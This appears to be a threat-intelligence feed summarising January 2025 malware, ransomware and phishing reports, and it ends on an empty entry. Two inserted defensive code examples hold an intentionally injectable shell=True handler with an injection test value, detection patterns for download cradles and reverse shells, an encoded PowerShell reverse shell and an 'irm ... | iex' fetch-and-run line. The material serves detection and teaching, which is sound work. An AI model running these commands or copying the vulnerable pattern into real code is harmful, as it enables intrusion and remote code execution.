Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Researchers from CYFIRMA have analyzed Astral Stealer, which is designed to steal sensitive information and maintain persistence on infected systems. It is written in Python, C# and Java and has multiple functions such as credential dumping, browser injection and data exfiltration through webhooks. It is available on GitHub, where attackers can use its built-in features. The stealer also offers paid features such as tracking backup codes, automatically changing email addresses, capturing new credit cards and passwords, and support for other targeted platforms.
Source: https://www.cyfirma.com/research/astral-stealer-analysis/
2025-01-30
Lynx_The_Ransomware_as_a_Service_Group
MEDIUM
Intel Source:
Group-IB
Intel Name:
Lynx_The_Ransomware_as_a_Service_Group
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Researchers at Group-IB have discovered a new RaaS group called Lynx that provides advanced tools and a structured platform for its affiliates to launch ransomware attacks. The affiliate panel is user-friendly and divided into multiple sections such as News, Companies, Chats, Stuffers and Leaks; these allow affiliates to manage victim profiles, customize ransomware payloads and schedule data leaks from a single interface. The group provides a ransomware toolkit called All-in-One Archive that works across systems such as Windows, Linux and ESXi, ensuring affiliates can target different IT environments. The group uses double-extortion tactics and allows affiliates to customize encryption settings based on attack requirements.
Source: https://www.group-ib.com/blog/cat-s-out-of-the-bag-lynx-ransomware/
2025-01-29
SystemBC_RAT_Targeting_Linus_Based_Platforms
LOW
Intel Source:
Any.Run
Intel Name:
SystemBC_RAT_Targeting_Linus_Based_Platforms
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Any.Run researchers have uncovered a SystemBC RAT targeting Linux-based platforms. The RAT is used to create proxy implants inside victims' networks and to target internal corporate services such as the company network, cloud servers and IoT devices. A proxy implant allows attackers to move around the network without being noticed. It uses an encrypted communication channel to its C2 servers to ensure the implant stays connected to the attacker's infrastructure, even across different systems such as Windows and Linux.
Source: https://x.com/anyrun_app/status/1884207667058463188
2025-01-29
SapphireRAT_Targeting_Latin_American
LOW
Intel Source:
Cofense
Intel Name:
SapphireRAT_Targeting_Latin_American
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Cofense researchers have uncovered a series of attacks that leverage fake legal documents, such as judicial receipts, to distribute and run SapphireRAT. The attackers hide the malware in deceptive legal documents and trick recipients into opening and running it. When the victim opens the document and runs the file, the malware activates and gives the attacker control of the victim's system, allowing them to steal important data or disrupt key operations. These attacks mainly target organisations in Latin America, where attackers are after valuable data and critical infrastructure.
Source: https://cofense.com/blog/malware-alert-fake-judicial-review-emails-deliver-sapphirerat-targeting-latin-american-victims
2025-01-29
Phorpiex_Botnet_Delivers_LockBit_Ransomware
MEDIUM
Intel Source:
Cybereason
Intel Name:
Phorpiex_Botnet_Delivers_LockBit_Ransomware
Date of Scan:
2025-01-29
Impact:
MEDIUM
Summary:
Cybereason researchers have identified an infamous botnet called Phorpiex, also known as Trik, which has been active since 2010 and is known for spam campaigns, cryptocurrency mining and post-exploitation malware. Attackers leverage the Phorpiex botnet to deliver LockBit Black ransomware (aka LockBit 3.0) because this variant downloads and executes the ransomware automatically. The botnet is primarily distributed through phishing emails that carry attachments such as Microsoft Word documents, PDFs or executables. The botnet operators offer it as a Botnet-as-a-Service to other cybercriminals, allowing them to distribute ransomware like LockBit efficiently.
Source: https://www.cybereason.com/blog/threat-analysis-phorpiex-downloader
2025-01-29
Attackers_Exploit_Government_Website
LOW
Intel Source:
Cofense
Intel Name:
Attackers_Exploit_Government_Website
Date of Scan:
2025-01-29
Impact:
LOW
Summary:
Cofense researchers have uncovered that threat actors have been exploiting .gov domains from various countries for phishing attacks over the past two years. They use these domains to host phishing pages, redirect users to malicious websites, or serve as C2 servers for malware. Most of the compromised .gov domains are linked to CVE-2024-25608, a vulnerability in the Liferay digital platform widely used by government organizations, which allows attackers to redirect users from a legitimate website to phishing sites. Brazil and the U.S. are the countries most affected by these phishing attacks.
Source: https://cofense.com/blog/threat-actors-exploit-government-website-vulnerabilities-for-phishing-campaigns
2025-01-28
Phishing_Pages_Targeting_Online_Shoppers
LOW
Intel Source:
Palo Alto
Intel Name:
Phishing_Pages_Targeting_Online_Shoppers
Date of Scan:
2025-01-28
Impact:
LOW
Summary:
Researchers at Palo Alto uncovered a campaign in which attackers impersonate well-known online shopping websites. These fake sites reuse the same template and design to appear legitimate. The campaign, which started in November 2024, entices users to enter their phone number and password on a counterfeit login page. Once users enter their credentials, the page shows the message “This account does not exist”; however, the credentials are sent to the attacker's server instead of being validated.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-pages-targeting-online-shoppers.txt
2025-01-28
Ransomware_Groups_Targeting_Healthcare_Sector
MEDIUM
Intel Source:
Any.Run
Intel Name:
Ransomware_Groups_Targeting_Healthcare_Sector
Date of Scan:
2025-01-28
Impact:
MEDIUM
Summary:
Any.Run researchers have observed that many ransomware groups are targeting the healthcare sector because it is underfunded and has vulnerable infrastructure, which makes it an easy and profitable target. The attackers encrypt health data and demand a ransom. Moreover, many healthcare systems cannot afford downtime because it impacts patient care. Interlock, one of the prominent ransomware groups, has been targeting the healthcare sector with double-extortion tactics. In 2024, it targeted multiple healthcare facilities in the United States, disrupting operations and exfiltrating patient information.
Source: https://any.run/cybersecurity-blog/interlock-ransomware-attack-analysis/
2025-01-27
Lumma_Stealer_Malware_Update
LOW
Intel Source:
Esentire
Intel Name:
Lumma_Stealer_Malware_Update
Date of Scan:
2025-01-27
Impact:
LOW
Summary:
eSentire researchers have observed that the developers of Lumma Stealer now use the ChaCha20 cipher to decrypt its configuration files. Lumma Stealer, also known as LummaC2 Stealer, steals sensitive information and is operated as Malware-as-a-Service (MaaS). The malware is often distributed through the ClickFix initial-access method, in which victims are tricked into executing malicious commands.
Source: https://www.esentire.com/blog/lumma-stealer-malware-updated-to-use-chacha20-cipher-for-config-decryption
2025-01-23
Clop_Exploits_Cleo_Vulnerabilities
LOW
Intel Source:
Imperva
Intel Name:
Clop_Exploits_Cleo_Vulnerabilities
Date of Scan:
2025-01-23
Impact:
LOW
Summary:
Researchers at Imperva have discovered the Clop ransomware group leveraging critical vulnerabilities (CVE-2024-50623 and CVE-2024-55956) in Cleo secure file-sharing software. These weaknesses enable attackers to execute code remotely and import unauthorized commands, resulting in data exfiltration and malicious payload execution. Imperva has tracked over 1 million exploitation attempts against almost 10,000 sites, primarily in the United States and Australia, affecting sectors such as finance and government.
Source: https://www.imperva.com/blog/imperva-protects-against-the-exploited-cves-in-the-cleo-data-theft-attacks/
2025-01-23
Secret_Blizzard_Part2
LOW
Intel Source:
Microsoft
Intel Name:
Secret_Blizzard_Part2
Date of Scan:
2025-01-23
Impact:
LOW
Summary:
Microsoft Threat Intelligence has reported that the Russian nation-state actor known as Secret Blizzard has been exploiting the tools and infrastructure of other cybercriminal groups to target Ukrainian military devices. Between March and April 2024, Secret Blizzard used the Amadey bot malware, associated with the cybercriminal group Storm-1919, to deploy its custom backdoors, including Tavdig and KazuarV2, on select Ukrainian military systems. This marks the second time since 2022 that Secret Blizzard has leveraged cybercrime infrastructure to gain access to its targets. Additionally, Secret Blizzard has co-opted tools from another Russian threat actor, Storm-1837, which focuses on Ukrainian military drone operators, to further infiltrate and compromise devices. These activities reflect a strategic approach by Secret Blizzard to diversify its attack vectors, including spear phishing, web compromises, and adversary-in-the-middle campaigns, while focusing on long-term espionage, particularly against defense-related sectors.
Source: https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/
2025-01-22
InvisibleFerret_Malware
LOW
Intel Source:
Any.Run
Intel Name:
InvisibleFerret_Malware
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Any.Run researchers have observed an increase in North Korean cyber-espionage campaigns that use fake job interview lures to distribute malware. Two malware families, BeaverTail and InvisibleFerret, are being distributed as part of this campaign, also known as Contagious Interview or DevPopper, which targets individuals in the tech, financial and cryptocurrency sectors. BeaverTail is the initial-stage malware that downloads a custom Python environment and deploys InvisibleFerret, which operates silently without leaving traces or logs.
Source: https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/
2025-01-22
SilentLynx_APT_Targets_Kyrgyzstan
LOW
+
Intel Source:
Seqrite
Intel Name:
SilentLynx_APT_Targets_Kyrgyzstan
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Researchers from Seqrite Labs have uncovered two campaigns by a threat actor called Silent Lynx that targets organisations in Eastern Europe and Central Asia, focusing on government think tanks, the banking sector and economic decision-making bodies. The recent campaigns target Kyrgyzstan: the first is themed around the National Bank of the Kyrgyz Republic, the second around the Ministry of Finance of Kyrgyzstan. Both begin with phishing emails carrying a RAR attachment that contains a decoy document to distract the victim.
Source: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/
2025-01-22
Critical_Fortinet_Zero_Day_CVE_2024_55591
LOW
+
Intel Source:
Cyble
Intel Name:
Critical_Fortinet_Zero_Day_CVE_2024_55591
Date of Scan:
2025-01-22
Impact:
LOW
Summary:
Researchers at Cyble have reported on a critical zero-day vulnerability, CVE-2024-55591, in FortiOS and FortiProxy that attackers are actively exploiting to obtain super-admin privileges. This authentication bypass, rated CVSSv3 9.6, abuses the Node.js WebSocket module to gain unauthenticated access to administrative functions.
Source: https://cyble.com/blog/cve-2024-55591-the-fortinet-flaw-putting-critical-systems-at-risk/
2025-01-21
Raspberry_Robin_Update_Exploits_CVE_2024_38196
LOW
+
Intel Source:
Zscaler ThreatLabz
Intel Name:
Raspberry_Robin_Update_Exploits_CVE_2024_38196
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Raspberry Robin, a malware strain, has recently been updated to include a privilege escalation exploit targeting CVE-2024-38196. This vulnerability allows attackers to elevate their privileges on affected systems, potentially enabling them to gain unauthorized access or perform malicious actions with elevated permissions.
Source: https://x.com/Threatlabz/status/1879956781360976155
2025-01-21
Phishing_Campaign_Targets_Financial_Data
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Phishing_Campaign_Targets_Financial_Data
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Researchers from CERT-AGID have uncovered an ongoing phishing campaign that impersonates the Italian Ministry of Health. The emails use the Ministry's logo and name, claim a refund of €265.67 from the National Health Service, and contain a link that redirects recipients to a fake page asking for personal details and credit card information. Victims are then asked to re-enter their card details on a second page, which increases the attackers' chances of collecting complete card data.
Source: https://cert-agid.gov.it/news/false-comunicazioni-del-ministero-della-salute-sfruttate-per-phishing-finanziario/
2025-01-21
Return_of_QBot
LOW
+
Intel Source:
Walmart Global Tech
Intel Name:
Return_of_QBot
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
QBot, also known as Qakbot or Pinkslipbot, is malware that has been active since 2007. It started as a banking trojan that stole financial information but has become a flexible tool for stealing data and distributing other malware through its C2 servers. Law enforcement disrupted QBot's infrastructure in August 2023, but recent signs indicate that the operators are active again. The group has also developed a new malware called BackConnect, which is linked to ransomware operators, especially Black Basta.
Source: https://medium.com/walmartglobaltech/qbot-is-back-connect-2d774052369f
2025-01-21
Nnice_Ransomware_Targeting_Windows
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Nnice_Ransomware_Targeting_Windows
Date of Scan:
2025-01-21
Impact:
MEDIUM
Summary:
CYFIRMA researchers have identified a new ransomware strain called Nnice, which is targeting Windows systems. This ransomware uses advanced encryption techniques, appending the .xdddd extension to encrypted files. It also changes the system wallpaper and leaves a ransom note ("Readme.txt") with recovery instructions.
Source: https://www.cyfirma.com/research/nnice-ransomware/
2025-01-21
Sliver_Implant_Targets_German_Entities
LOW
+
Intel Source:
Cyble
Intel Name:
Sliver_Implant_Targets_German_Entities
Date of Scan:
2025-01-21
Impact:
LOW
Summary:
Researchers at Cyble have analyzed a sophisticated attack targeting German entities that combines DLL sideloading, DLL proxying and the Sliver framework. The attack begins with a deceptive LNK file delivered inside an archive; when executed, it launches a legitimate program (wksprt.exe) that sideloads a malicious DLL.
Source: https://cyble.com/blog/sliver-implant-targets-german-entities-with-dll-sideloading-and-proxying-techniques/
2025-01-19
IoT_Botnet_Targets_Global_Networks
LOW
+
Intel Source:
Trend Micro
Intel Name:
IoT_Botnet_Targets_Global_Networks
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Trend Micro have observed large-scale DDoS attacks orchestrated by an IoT botnet, primarily targeting enterprises in Japan but also abroad. The botnet, built from malware variants derived from Mirai and Bashlite, compromises IoT devices such as wireless routers and IP cameras by exploiting vulnerabilities and weak passwords. Infected devices communicate with command-and-control servers to launch various DDoS attacks, update the malware and provide proxy services.
Source: https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
2025-01-19
SEO_Manipulation_by_Gootloader
LOW
+
Intel Source:
Sophos
Intel Name:
SEO_Manipulation_by_Gootloader
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Sophos have reconstructed the server-side workings of Gootloader, an SEO-driven malware loader that uses compromised WordPress sites to lure victims. Gootloader poisons Google search results to send users to legitimate sites that have been altered to display fake message boards, with malware links embedded in seemingly relevant discussion threads.
Source: https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/
2025-01-18
Nickel_Tapestry_Fraud_Connections
LOW
+
Intel Source:
Secureworks
Intel Name:
Nickel_Tapestry_Fraud_Connections
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Researchers at Secureworks Counter Threat Unit have discovered linkages between North Korean IT worker schemes and a 2016 crowdfunding scam. The schemes, attributed to the NICKEL TAPESTRY threat group, included front firms such as Yanbian Silverstar in China and Volasys Silver Star in Russia, both of which were sanctioned by the United States Department of Treasury in 2018.
Source: https://www.secureworks.com/blog/nickel-tapestry-infrastructure-associated-with-crowdfunding-scheme
2025-01-18
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
MEDIUM
+
Intel Source:
Arctic Wolf
Intel Name:
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
Arctic Wolf Labs researchers have observed a recent campaign targeting Fortinet FortiGate firewalls with exposed management interfaces on the public internet. Threat actors gained unauthorized access, creating new accounts, modifying configurations, and extracting credentials. While the initial access vector remains unconfirmed, there is high confidence that a zero-day vulnerability is involved.
Source: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/
2025-01-18
RansomHub_Affiliate_Uses_Python_Based_Backdoor
MEDIUM
+
Intel Source:
GuidePoint
Intel Name:
RansomHub_Affiliate_Uses_Python_Based_Backdoor
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
GuidePoint Security researchers have uncovered a Python-based backdoor used by a threat actor to maintain access to compromised devices. Initial access comes through fake software updates that impersonate legitimate update prompts; about 20 minutes after the initial infection, the Python backdoor is installed on the compromised device. The attackers then use RDP to move laterally to other systems in the network and deploy additional Python backdoors, and ultimately leverage that access to deploy RansomHub ransomware across the network.
Source: https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/
2025-01-18
Analyzing_a_Web_Shell_Intrusion
LOW
+
Intel Source:
Trend Micro
Intel Name:
Analyzing_a_Web_Shell_Intrusion
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Trend Micro researchers investigated a customer incident that began with suspicious activity flagged by endpoint sensors. The IIS worker process (w3wp.exe) on a public-facing server was compromised after an attacker uploaded a web shell, which at the time faced no restrictions. From the web shell the attacker created a new account and changed an existing user's password, and ran an encoded PowerShell command that established a reverse TCP shell for command-and-control. Further investigation found multiple payloads downloaded to the system, and the attacker's initial access was traced through the web server requests that interacted with the web shell.
Source: https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html
2025-01-17
KongTuke_Campaign_Exploits_BOINC
LOW
+
Intel Source:
PaloAlto
Intel Name:
KongTuke_Campaign_Exploits_BOINC
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
KongTuke is a malicious campaign involving injected scripts that create fake "verify you are human" pages on websites. These pages trick users into executing a malicious PowerShell script by copying it into their clipboard and following instructions to run it. The script leads to an infection that exploits BOINC (Berkeley Open Infrastructure for Network Computing), a legitimate platform often used by research organizations. The attackers set up rogue BOINC project servers with domains like rosettahome[.]cn and rosettahome[.]top, attempting to disguise them as legitimate rosetta@home servers. However, these servers are unrelated to rosetta@home and are used for malicious purposes in the campaign.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-13-IOCs-for-Kongtuke-activity.txt
2025-01-17
Star_Blizzard_Targets_WhatsApp_Accounts
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Star_Blizzard_Targets_WhatsApp_Accounts
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
Microsoft researchers have identified that the Russian threat actor Star Blizzard is using a new tactic to target victims through WhatsApp. The group typically targets government officials, diplomats, defense policy researchers and those assisting Ukraine in the war with Russia. In this campaign, spear-phishing emails impersonating a U.S. government official contain a QR code that supposedly joins a WhatsApp group supporting Ukrainian NGOs. The QR code is deliberately non-functional; when the target replies, the attackers send a second email with a link to a web page asking the target to scan another QR code, which actually links the victim's WhatsApp account to the attacker's device. This gives the attacker access to the victim's WhatsApp messages and the ability to exfiltrate data using browser plugins.
Source: https://www.microsoft.com/en-us/security/blog/2025/01/16/new-star-blizzard-spear-phishing-campaign-targets-whatsapp-accounts/
2025-01-17
Exploitation_of_Aviatrix_Controller_Vulnerability
MEDIUM
+
Intel Source:
Wiz
Intel Name:
Exploitation_of_Aviatrix_Controller_Vulnerability
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
Wiz researchers have identified a critical vulnerability, CVE-2024-50603, in the Aviatrix Controller that allows unauthenticated attackers to execute commands on the system remotely. The flaw exists because the controller does not properly sanitize user-supplied input in its API before that input reaches the operating system. The impact is most severe when the Aviatrix Controller is deployed in AWS, where the controller's privileges can give an attacker high-privilege access to the wider cloud environment. Wiz also observed attackers exploiting the flaw in the wild to mine cryptocurrency and install backdoors.
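The bug class described above, an API parameter that reaches a shell, shown as a vulnerable handler beside a hardened one. This is an added example and not Aviatrix's code: the `cloud_type` parameter, the `list-gateways` tool and the `echo` stand-in for the real binary are all hypothetical, chosen so the example runs anywhere.

```python
"""Added example, not Aviatrix's code: an API parameter spliced into a shell
command (vulnerable) versus validated and passed as argv (hardened).
The parameter name, the tool and the `echo` stand-in are hypothetical."""
import re
import subprocess

TOOL = "echo"  # stand-in for the real command-line tool the API wraps
ALLOWED_CLOUD_TYPES = {"aws", "azure", "gcp"}


def run_vulnerable(cloud_type: str) -> str:
    """Vulnerable pattern: the untrusted value is spliced into a shell string and run with
    shell=True, so a value like 'aws; id' or 'aws$(id)' executes attacker-chosen commands."""
    cmd = f"{TOOL} list-gateways --cloud {cloud_type}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(cloud_type: str) -> str:
    """Hardened pattern: validate against an allow-list, then pass argv with no shell, so
    metacharacters in the value could only ever be bytes inside one argument."""
    if cloud_type not in ALLOWED_CLOUD_TYPES:
        raise ValueError(f"unsupported cloud_type: {cloud_type!r}")
    argv = [TOOL, "list-gateways", "--cloud", cloud_type]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def is_injection_attempt(value: str) -> bool:
    """Cheap request-log check: shell metacharacters in a parameter that should be one token."""
    return re.search(r"[;&|`$()<>\r\n]", value) is not None


if __name__ == "__main__":
    print(run_vulnerable("aws; echo INJECTED"))   # second line shows the injected command ran
    print(run_hardened("aws"))                     # single line, the value is just an argument
```

The argv fix removes the injection but not the blast radius: on AWS the controller's role should be scoped to the minimum it needs, because the "high privilege" concern in the summary is about what a shell on the controller can reach.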
Source: https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
2025-01-17
Deep_Dive_Into_a_Linux_Rootkit_Malware
LOW
+
Intel Source:
Fortinet
Intel Name:
Deep_Dive_Into_a_Linux_Rootkit_Malware
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
Fortinet researchers have analyzed a rootkit that infects Linux systems and was deployed using a zero-day exploit. The malware has two components, a kernel module and a user-space program. The kernel module creates a hidden communication channel through a Linux system file and hijacks network traffic; it establishes a secure session and processes encrypted commands that let the attacker restart processes or execute system commands with root privileges. The user-space program looks like a normal process but secretly runs the attacker's commands in the background, coordinating with the kernel module.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware
2025-01-16
SharpRhino_A_New_RAT_Malware
LOW
+
Intel Source:
Acronis
Intel Name:
SharpRhino_A_New_RAT_Malware
Date of Scan:
2025-01-16
Impact:
LOW
Summary:
Researchers at Acronis have analyzed a RAT called SharpRhino developed by Hunters International, a RaaS group. The malware first appeared in 2024 and is designed to give remote control over a compromised machine. It is delivered as a fake software installer built with the Nullsoft Scriptable Install System (NSIS). When the installer runs, it drops a PowerShell script containing .NET payloads that communicate with the C2 server, allowing attackers to execute commands on the compromised machine.
Source: https://www.acronis.com/en-us/cyber-protection-center/posts/sharprhino-an-old-new-threat/
2025-01-16
Double_Tap_Campaign
MEDIUM
+
Intel Source:
Sekoia
Intel Name:
Double_Tap_Campaign
Date of Scan:
2025-01-16
Impact:
MEDIUM
Summary:
Researchers from Sekoia have uncovered a cyber espionage campaign called Double Tap conducted by UAC-0063, a Russia-linked group possibly related to APT28 (GRU). The campaign weaponized legitimate documents from Kazakhstan's Ministry of Foreign Affairs as macro-enabled Word lures targeting Central Asia. The macros install HATVIBE, a backdoor that downloads and executes additional payloads, followed by a more capable Python-based backdoor called CHERRYSPY. The purpose of the operation is to gather intelligence on Kazakhstan's diplomatic relations and geopolitical activities, such as its economic partnerships with Western countries and China and its role in the Middle Corridor trade route through Central Asia.
Source: https://blog.sekoia.io/double-tap-campaign-russia-nexus-apt-possibly-related-to-apt28-conducts-cyber-espionage-on-central-asia-and-kazakhstan-diplomatic-relations/
2025-01-15
CVE_2017_0199_Exploit_Campaign_Targets_with_RATs
LOW
+
Intel Source:
PaloAlto
Intel Name:
CVE_2017_0199_Exploit_Campaign_Targets_with_RATs
Date of Scan:
2025-01-15
Impact:
LOW
Summary:
Threat actors have exploited CVE-2017-0199 through malicious Microsoft Office documents for years, targeting unpatched systems, yet new exploit samples still appear regularly. A campaign active since 2023 or earlier primarily distributes DBatLoader/GuLoader-style malware, delivered as a .NET DLL embedded in an image using steganography and reversed Base64 encoding. Recent variations have delivered remote access tools (RATs) such as Agent Tesla, Formbook (XLoader), LokiBot and Remcos.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-10-IOCs-for-CVE-2017-0199-XLS-infection-chain.txt
2025-01-13
Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Lumma_Stealer_Uses_Fake_CAPTCHAs_to_Spread_Malware
Date of Scan:
2025-01-13
Impact:
LOW
Summary:
Lumma Stealer malware is using fake CAPTCHA challenges to deceive users into executing malicious scripts. In a campaign observed by CERT-AGID in October 2024, victims were misled by a fake CAPTCHA warning about a security issue with their GitHub repositories. Following the CAPTCHA's instructions led to executing a PowerShell script that infected systems with Lumma Stealer. Additionally, an Italian domain running outdated WordPress was compromised to spread the malware through a hidden Base64-encoded JavaScript that generated a fake CAPTCHA for Windows users. Executing the script triggered the malware download and installation.
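Three entries above describe PowerShell launched in ways a defender can catch at process creation: the IIS worker process (w3wp.exe) running an encoded reverse-shell command in the Trend Micro web shell case, and explorer.exe running a download cradle when a user pastes a fake CAPTCHA's clipboard payload into the Run dialog (the KongTuke and Lumma Stealer campaigns). The triage logic below is an added example, not code from Trend Micro, Unit 42 or CERT-AGID; the event schema, the three sample events, the IP and the `captcha.example` domain are constructed for the example.

```python
"""Added example (not from the vendors above): triage constructed process-creation
events for w3wp.exe -> powershell (web shell) and explorer.exe -> powershell
(ClickFix paste), decoding -EncodedCommand payloads on the way."""
import base64
import re
from typing import Optional

CRADLE_PATTERNS = [r"\biwr\b", r"\birm\b", r"invoke-webrequest", r"invoke-restmethod",
                   r"downloadstring", r"downloadfile", r"\biex\b", r"invoke-expression"]
REVERSE_SHELL_PATTERNS = [r"net\.sockets\.tcpclient", r"getstream\(\)", r"\$client\."]
# Parents that should not launch PowerShell in normal operation (web worker) or
# that do so only when a user pastes a command into Win+R (explorer.exe).
SUSPICIOUS_PARENTS = {
    "w3wp.exe": "web shell / server-side execution",
    "explorer.exe": "user-pasted command (ClickFix)",
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -e/-ec/-enc/-EncodedCommand, or the input unchanged."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def triage_event(event: dict) -> Optional[dict]:
    """Return a finding for a suspicious PowerShell launch, or None if nothing matched."""
    image = event["image"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    raw = event["command_line"]
    decoded = decode_encoded_command(raw)
    lowered = decoded.lower()
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent {parent}: {SUSPICIOUS_PARENTS[parent]}")
    if any(re.search(p, lowered) for p in CRADLE_PATTERNS):
        reasons.append("download cradle")
    if any(re.search(p, lowered) for p in REVERSE_SHELL_PATTERNS):
        reasons.append("reverse shell")
    if re.search(r"-(?:windowstyle|win|w)\s+hidden", raw, re.IGNORECASE):
        reasons.append("hidden window")
    if not reasons:
        return None
    return {"pid": event["pid"], "parent": parent, "reasons": reasons, "decoded": decoded.strip()}


# Constructed reverse-shell one-liner, encoded the way an attacker passes it to -enc.
REVERSE_SHELL_SCRIPT = ("$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',4444);"
                        "$stream = $client.GetStream()")
ENCODED = base64.b64encode(REVERSE_SHELL_SCRIPT.encode("utf-16-le")).decode()

# Constructed sample events: web shell, ClickFix paste, and a benign scheduled script.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"pid": 5588, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -c "irm https://captcha.example/verify | iex"'},
    {"pid": 6012, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["pid"], triage_event(ev))
```

The parent-process check is the durable part: cradle and reverse-shell strings change between campaigns, but neither a web worker nor the Run dialog has a legitimate reason to start a hidden PowerShell in most environments.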
Source: https://cert-agid.gov.it/news/analisi-di-una-campagna-lumma-stealer-con-falso-captcha-condotta-attraverso-domino-italiano-compromesso/
2025-01-13
FunkSec_Ransomware_Group
LOW
+
Intel Source:
Check Point
Intel Name:
FunkSec_Ransomware_Group
Date of Scan:
2025-01-13
Impact:
LOW
Summary:
Check Point researchers have uncovered a new ransomware group called FunkSec that emerged in 2024 and operates as a Ransomware-as-a-Service (RaaS). The group claimed 85 victims in a single month of activity. It mixes cybercrime with hacktivism, which makes its motives unclear, and uses double extortion: stealing sensitive data and encrypting victims' files, then demanding a ransom for both. Its operations appear to be run by inexperienced actors who lean on AI tooling to develop their malware. FunkSec targets organisations in India and the U.S. and often ties its attacks to political causes such as the Free Palestine movement.
Source: https://research.checkpoint.com/2025/funksec-alleged-top-ransomware-group-powered-by-ai/
2025-01-12
Malware_Spread_via_Fake_Installers_on_Social_Media
LOW
+
Intel Source:
Trend Micro
Intel Name:
Malware_Spread_via_Fake_Installers_on_Social_Media
Date of Scan:
2025-01-12
Impact:
LOW
Summary:
Researchers at Trend Micro describe a growing threat in which attackers use YouTube and social media to share links to fake installers and cracks that lead to malicious sites. The downloads are often hosted on reputable file-sharing services such as Mediafire and Mega.nz to evade detection, and many are password-protected and encoded, making them hard for security tools to analyze. Once installed, the malware steals sensitive data, including browser credentials. The report highlights how attackers exploit interest in pirated software and pose as legitimate software guides on YouTube to trick users into clicking harmful links and compromising their own devices.
Source: https://www.trendmicro.com/en_us/research/25/a/how-cracks-and-installers-bring-malware-to-your-device.html
2025-01-12
RedCurl_Cyberespionage_in_Canada
MEDIUM
+
Intel Source:
Huntress
Intel Name:
RedCurl_Cyberespionage_in_Canada
Date of Scan:
2025-01-12
Impact:
MEDIUM
Summary:
Researchers at Huntress have discovered cyberespionage activity targeting Canadian organizations, which they attribute to the APT group RedCurl (also known as Earth Kapre or Red Wolf). The activity Huntress tracked dates back to at least November 2023 and shows RedCurl using new and evolving techniques to gain access to and exfiltrate sensitive data, such as emails and corporate records, while avoiding detection.
Source: https://www.huntress.com/blog/the-hunt-for-redcurl-2
2025-01-12
Banshee_MacOS_Stealer
LOW
+
Intel Source:
Check Point
Intel Name:
Banshee_MacOS_Stealer
Date of Scan:
2025-01-12
Impact:
LOW
Summary:
